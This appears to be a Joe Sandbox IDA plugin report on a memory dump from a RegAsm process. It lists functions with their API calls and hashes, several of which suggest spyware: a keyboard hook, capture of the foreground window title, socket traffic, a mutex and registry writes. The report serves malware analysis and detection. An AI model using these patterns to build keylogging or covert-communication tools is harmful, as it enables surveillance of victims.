Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: 41fac99623056356db925a1322829ea0c7156d24612c337f6d29b46335df47c5
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: 1301FC32602327EBD7218B789C4495B7B58BF05B61B214639FD09D3241EF28DD01C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 0044EFD9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EE7A,?,00000000), ref: 0044F04D
GetCPInfo.KERNEL32(00000000,zD,?,?,?,0044EE7A,?,00000000), ref: 0044F060

Strings

zD, xrefs: 0044F05B, 0044F05E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: zD
API String ID: 546120528-361017932
Opcode ID: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
Instruction ID: 95e1a41fa6d7b96ba5c2a24ac673e79d39a036a2d94f7298004cea64e63b24f6
Opcode Fuzzy Hash: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
Instruction Fuzzy Hash: 4051F471A002569EFB20CF76C8816BBBBE5EF81314F14807FD48687252D63D994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040482D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Strings

I+, xrefs: 00404846

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID: I+
API String ID: 1953588214-1242272510
Opcode ID: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00414E37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000, I+,004750E4,00000000,004150D6,00000000,00000001), ref: 00414E59
WSASetLastError.WS2_32(00000000), ref: 00414E5E

Part of subcall function 00414CD4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414D23
Part of subcall function 00414CD4: LoadLibraryA.KERNEL32(?), ref: 00414D65
Part of subcall function 00414CD4: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414D85
Part of subcall function 00414CD4: FreeLibrary.KERNEL32(00000000), ref: 00414D8C
Part of subcall function 00414CD4: LoadLibraryA.KERNEL32(?), ref: 00414DC4
Part of subcall function 00414CD4: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414DD6
Part of subcall function 00414CD4: FreeLibrary.KERNEL32(00000000), ref: 00414DDD
Part of subcall function 00414CD4: GetProcAddress.KERNEL32(00000000,?), ref: 00414DEC

Strings

I+, xrefs: 00414E50

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID: I+
API String ID: 1170566393-1242272510
Opcode ID: 5f54ddb93d2713db6754903b2bfaa3ab0bf13d314d5671efb2405644ea361ed7
Instruction ID: 58ee6cb4ac7b8a84153b3ebb1dd1791b00357fb3ca99eb11fea15aa8b3331a22
Opcode Fuzzy Hash: 5f54ddb93d2713db6754903b2bfaa3ab0bf13d314d5671efb2405644ea361ed7
Instruction Fuzzy Hash: 20D012723025216B9710A75E6D00BF79799DBD77607060037F504D2110D6945C4183E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EB56,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040CFC6
GetLastError.KERNEL32 ref: 0040CFD1

Strings

SG, xrefs: 0040CFB7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Uniqueness

Uniqueness Score: -1.00%

Function 004134F4 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
RegQueryValueExA.KERNEL32 ref: 00413535
RegCloseKey.KERNEL32(?), ref: 00413540

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 11ad58ed07fa4a0a265b1ef9ab622cf9d1d79dbf7f3678ccb4777a53df69ef08
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: FF01D676900228FBCF209B95DC08DEF7F7DDB44B51F000166BB09E2140DA749E45DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413646 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413662
RegQueryValueExA.KERNEL32 ref: 0041367B
RegCloseKey.KERNEL32(00000000), ref: 00413686

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
Instruction ID: 136777831733cc42731b161c89641b3c83b116acaaa4d3a405525fee88e85c23
Opcode Fuzzy Hash: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
Instruction Fuzzy Hash: A4014B31900229FBCF219F91DC05DEB7F39EF05761F0041A5BE0862261D6358AA9DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413497 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
RegQueryValueExA.KERNEL32 ref: 004134D5
RegCloseKey.KERNEL32(?), ref: 004134E0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: e794e59b5ca6a57b749d61e58330535b6f90d7e0fac61ab044fd0cc5ac3c4881
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: 13F0F976900218FFDF119FA49D05BEA7BBCEB04B11F1040A6BE08E6191D2359A549B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041344D Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413464
RegQueryValueExA.KERNEL32 ref: 00413478
RegCloseKey.KERNEL32(?), ref: 00413483

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: e49fa1678814d70b7460577f8c92d0bb3d1ec56b87fc076ee76b734fba8ab665
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction Fuzzy Hash: 83E06531801338FB9F208FA29C0DEEB7F6CDF0ABA5B004155BD0CA1111D2258E50E6E4

Uniqueness

Uniqueness Score: -1.00%

Function 004137C5 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004137EE
RegCloseKey.KERNEL32(004660A4), ref: 004137F9

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: ead8b78bb389cf5df025ceee4aae861e94320b11b9276a5e3b9bfc9d6c17330c
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 69E06572500318FBDF105F90DC05FEA7F6CDF04B52F104465BF09A6191D2358E14A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0044EC84 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044ECA9

Strings

, xrefs: 0044ECEE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 84acfb2f62f4b6a154c48ec12cdd790d23cfb55310a432a2025d4a90b2570787
Instruction ID: c51ce27006a4a7b18c6d68e7e00565b5c4bfe6dcd5d6d641e95b73cc6421fd5f
Opcode Fuzzy Hash: 84acfb2f62f4b6a154c48ec12cdd790d23cfb55310a432a2025d4a90b2570787
Instruction Fuzzy Hash: 71412DB09043989BEF218E25CC84AF6BBB9FF45308F1404EEE58A87142D2399A45DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Strings

pQG, xrefs: 00409E2D

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: pQG
API String ID: 176396367-3769108836
Opcode ID: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
Instruction ID: 95d278e3f05488c0820dd2c8153ac27ae1675786c683aeaf702fa7e1242427c2
Opcode Fuzzy Hash: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
Instruction Fuzzy Hash: 6C11C6319002059BCB15EF65E8519EF77B4EF54318B10413FF805A62E2EF789D05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00448A73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448AE4

Strings

LCMapStringEx, xrefs: 00448A8E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: aeff04b9e1330a78e3745f5766547c5ef7007f6700fb0a98c30d74b10de21cc7
Instruction ID: 798851d8e7b52c86ca7a74637d18342b45269bd0c15117f90c4c26d34f3f196e
Opcode Fuzzy Hash: aeff04b9e1330a78e3745f5766547c5ef7007f6700fb0a98c30d74b10de21cc7
Instruction Fuzzy Hash: 7E012532500209FBCF02AF90DC01EEE7F62EF08751F14816AFE0925161CA7A9971AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00448944 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BE0F,-00000020,00000FA0,00000000,00467378,00467378), ref: 0044898F

Strings

InitializeCriticalSectionEx, xrefs: 0044895F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: a76d7217fef8a8a24fe9d07e154b183f8c9051a3711cd6d9424cf973901b1caf
Instruction ID: 48097f8e69e60d0fbdf0d93695612d18bceaa29e929d3af29cae8912f379515c
Opcode Fuzzy Hash: a76d7217fef8a8a24fe9d07e154b183f8c9051a3711cd6d9424cf973901b1caf
Instruction Fuzzy Hash: C5F0B43564060CFBCB015F51DC05DAE7F61DF08722B14416AFD095A261CE359D15AADE

Uniqueness

Uniqueness Score: -1.00%

Function 004485D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044860F

Strings

FlsAlloc, xrefs: 004485EB

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 613f7c9b052d04db455aa4d13f38f7a1de3780f99242abc3613f40b7983620e2
Instruction ID: c85361ce25ec699d323bf384929ea58fe69bbcf6818c0ab62a420a4a41af99e3
Opcode Fuzzy Hash: 613f7c9b052d04db455aa4d13f38f7a1de3780f99242abc3613f40b7983620e2
Instruction Fuzzy Hash: CAE0E530640618E7D700AF65DC06A6EBB94CF48B13B11417EFD0557392CE795D0589DE

Uniqueness

Uniqueness Score: -1.00%

Function 00438CD4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00438CE9

Strings

FlsAlloc, xrefs: 00438CE2

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: db46098482b006930fe693244ba69320473aa73364ae79a08566a01f8775448c
Instruction ID: e83752752098bbbf38ced2399c05520294b5bc1769486be0f44edf4bdb7140ce
Opcode Fuzzy Hash: db46098482b006930fe693244ba69320473aa73364ae79a08566a01f8775448c
Instruction Fuzzy Hash: 1DD02B31BC032C66861036816C02B99F644CB44BB7F001067FF0831282989D591041DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B704 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B718

Strings

@, xrefs: 0041B70E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

Uniqueness

Uniqueness Score: -1.00%

Function 0044EE18 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 0044EF37: _abort.LIBCMT ref: 0044EF69
Part of subcall function 0044EF37: _free.LIBCMT ref: 0044EF9D

Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7

_free.LIBCMT ref: 0044EE90
_free.LIBCMT ref: 0044EEC6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 9d0edbce02ef96580065cde65559fb61b1a01578013f55d28fa49669f7f22364
Instruction ID: afb2a9087478ec41e314e0473c94043602b5b99840e25ac3086ca26a5d64e734
Opcode Fuzzy Hash: 9d0edbce02ef96580065cde65559fb61b1a01578013f55d28fa49669f7f22364
Instruction Fuzzy Hash: 3F31B331904208AFEB10EBABD441BAA77E4FF40364F35409FE9049B2A1EB399D41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044838A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004481A7,00000000), ref: 004483EA
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 004483F7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 70e56b3805e4ef07161e3a25c3925f2cb11532a2b079620e091ad9b2e9b7f634
Instruction ID: 11ef690a5562505e41a83ce2398e75eca6c04faf322ea2aaafd0f2ad2ecea0d0
Opcode Fuzzy Hash: 70e56b3805e4ef07161e3a25c3925f2cb11532a2b079620e091ad9b2e9b7f634
Instruction Fuzzy Hash: 46110637A001219BEB229F1DDC4086F7395AB80764716827AFD18AB354EF35EC4286E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9783cd07836bbf509f8d7adbf05c977e0e779568928fb9c76be5f3f5da226373
Instruction ID: 6f1b0d0169e77966675ad5691f9169be4e0cc9de139e257b054d072cd1bb7e5e
Opcode Fuzzy Hash: 9783cd07836bbf509f8d7adbf05c977e0e779568928fb9c76be5f3f5da226373
Instruction Fuzzy Hash: 00F0E2706042015ACB1C9734CC50B6E76994B84325FA48F3FF01AD61E0D73ED8A18A0D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9E4 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041BA06
GetWindowTextW.USER32 ref: 0041BA19

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
Instruction ID: 637cd5112d301657ed660dbb1bed4a0c67cc53091dd33397c2e6fc7b47bdc960
Opcode Fuzzy Hash: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
Instruction Fuzzy Hash: 75E0D871A00328A7E720A7A4AC4EFE5776CEB08711F0000EABA18D31C2EAB49D04C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0043A32C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00438CD4: try_get_function.LIBVCRUNTIME ref: 00438CE9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A34A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A355

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: f6d0d639edb2ab0688741cad44cbb231bd36136357f1527acf36222b1c253f40
Instruction ID: 3f3f6c44bfe6bb6ad61a6fe829c7718af480afeba8b06594deee43cbf2c31560
Opcode Fuzzy Hash: f6d0d639edb2ab0688741cad44cbb231bd36136357f1527acf36222b1c253f40
Instruction Fuzzy Hash: 77D0A9200C8340041C0462BA280229B13442B2A7BCF70729FF9A4862C2EE1D8169662F

Uniqueness

Uniqueness Score: -1.00%

Function 0043A95B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0043A9B0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 244a1184682cdb99d35990a0071561110f99868f830fe7c55d9753075e88c79d
Instruction ID: 12bcbc205a2304f06473162d413db6a6d7c57e09e75f601bad43f5bd441db2ac
Opcode Fuzzy Hash: 244a1184682cdb99d35990a0071561110f99868f830fe7c55d9753075e88c79d
Instruction Fuzzy Hash: 520128B1950308BFDB24DF65C802B6E77A8EF04329F11996FE845A7200D67A9D00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A367 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CallNextHookEx.USER32 ref: 0040A3D2

Part of subcall function 0040B594: GetKeyState.USER32(00000011), ref: 0040B599

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallHookNextState
String ID:
API String ID: 3280314413-0
Opcode ID: 7b839fe3822cfde6c47710b93c5a750d28e9a5dbf279d3bce1f3a8604ae010dd
Instruction ID: d90bc2b7d98db8c2e21a4caa228ec2b871c95e0dc810641eeb38a1ac509cfd94
Opcode Fuzzy Hash: 7b839fe3822cfde6c47710b93c5a750d28e9a5dbf279d3bce1f3a8604ae010dd
Instruction Fuzzy Hash: 0FF0D6322003015BCA14AE799C4582FBB55DB95308B00083FFD01666D2CB7ADC258B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00446077 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: fc72969beeef8e46adb3e5c897d71457bd534b1de3a68609239d713461f06929
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: ADE0E53110061566FA31BAA69C04B5B368D8B037A5F164123EC0596281DA6CCC0041AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Uniqueness

Uniqueness Score: -1.00%

Function 00426BFF Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00426C09

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
